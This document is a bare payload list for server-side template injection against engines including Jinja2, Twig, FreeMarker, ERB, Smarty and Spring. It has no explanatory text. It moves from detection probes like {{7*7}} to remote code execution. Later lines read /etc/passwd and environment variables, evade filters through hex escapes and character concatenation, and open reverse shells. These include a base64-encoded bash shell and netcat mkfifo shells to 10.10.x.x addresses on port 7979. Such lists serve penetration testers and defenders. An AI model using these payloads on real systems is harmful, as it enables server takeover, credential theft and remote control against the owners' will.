${{<%[%'"}}%\.
{% debug %}
{7*7}
%{7*7}
%{{7*7}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
${{7*7}}
${= 3*3}
@(6+5)
@(3*3)
#{3*3}
#{7+7}
#{{7*7}}
#{ 3 * 3 }
#{{7*7}}
#{{ '7'*7 }}
[=7*7]
[[3*3]]
*{7*7}
{{= 7*7}}
{{7*7}}
{{ '7'*7 }}
{{2*2}}[[3*3]]
{{3*'3'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}} 
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['id']|filter('system')}}
<%= File.open('id').read %>
<%= File.open('whoami').read %>
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("whoami")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('whoami')}
${"freemarker.template.utility.Execute"?new()("id")}
${"freemarker.template.utility.Execute"?new()("whoami")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('id').read() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('whoami').read() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("id").read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("whoami").read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('pwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls+/').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls%2B/').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls%2B%2F').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat+/*.txt').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat%2B/*.txt').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat%2B%2F*.txt').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat%2B%2F%2A.txt').read()}}
{{config.__class__.__init__.__globals__['os'].popen('echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC83OTc5IDA+JjE=${IFS}|base64${IFS}-d|bash')}}.read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("pwd").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("id").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls+/").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls%2B/").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls%2B%2F").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls%2B../").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls%2B..%2F").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls%2B../../").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("ls%2B..%2F..%2F").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("cat+/*.txt").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("cat%2b/*.txt").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("cat%2b%2F*.txt").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("cat%2b%2F%2A.txt").read()}}
{{config.__class__.from_envvar.__globals__.__builtins__. __import__("os").popen("echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC83OTc5IDA+JjE=${IFS}|base64${IFS}-d|bash").read()}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
{{_self.env.enableDebug()}}{{_self.env.isDebug()}}
{{app.request.files.get(1).__construct('id','')}}
{{app.request.files.get(1).openFile.fread(99)}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['whoami']|filter('system')}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{["id"]|map("system")|join(",")
{{["id",0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0,0]|reduce("system","id")|join(",")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"/etc/passwd\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
{{{{[\'pwd']|filter('system')}}}}
{{{{[\'id']|filter('system')}}}}
{{{{[\'whoami']|filter('system')}}}}
{{{{[\'ls']|filter('system')}}}}
{{{{[\'ls+/']|filter('system')}}}}
{{{{[\'ls%2B/']|filter('system')}}}}
{{{{[\'ls%2B%2F']|filter('system')}}}}
{{{{[\'cat+/*.txt']|filter('system')}}}}
{{{{[\'cat%2B/*.txt']|filter('system')}}}}
{{{{[\'cat%2B%2F*.txt']|filter('system')}}}}
{{{{[\'cat%2B%2F%2A.tx']|filter('system')}}}}
{{{{[\'whoami']|filter('system')}}}}
{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 7979 >/tmp/f']|filter('system')}}}}
{{{{['pwd']|map("system")|join}}}}
{{{{['id']|map("system")|join}}}}
{{{{['ls']|map("system")|join}}}}
{{{{['ls+/']|map("system")|join}}}}
{{{{['ls%2B/']|map("system")|join}}}}
{{{{['ls%2B../']|map("system")|join}}}}
{{{{['ls%2B..%2F']|map("system")|join}}}}
{{{{['ls%2B../../']|map("system")|join}}}}
{{{{['ls%2B..%2F..%2F']|map("system")|join}}}}
{{{{['cat+/*.txt']|map("system")|join}}}}
{{{{['cat%2b/*.txt']|map("system")|join}}}}
{{{{['cat%2b%2F*.txt']|map("system")|join}}}}
{{{{['cat%2b%2F%2A.txt']|map("system")|join}}}}
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("id")|attr("read")()}}
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("whoami")|attr("read")()}}
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("rm+/tmp/f;mkfifo+/tmp/f3bcat+/tmp/f|bash+-i+2>261|nc+10.10.14.16+7979+>/tmp/f+|+bash")|attr("read")()}}
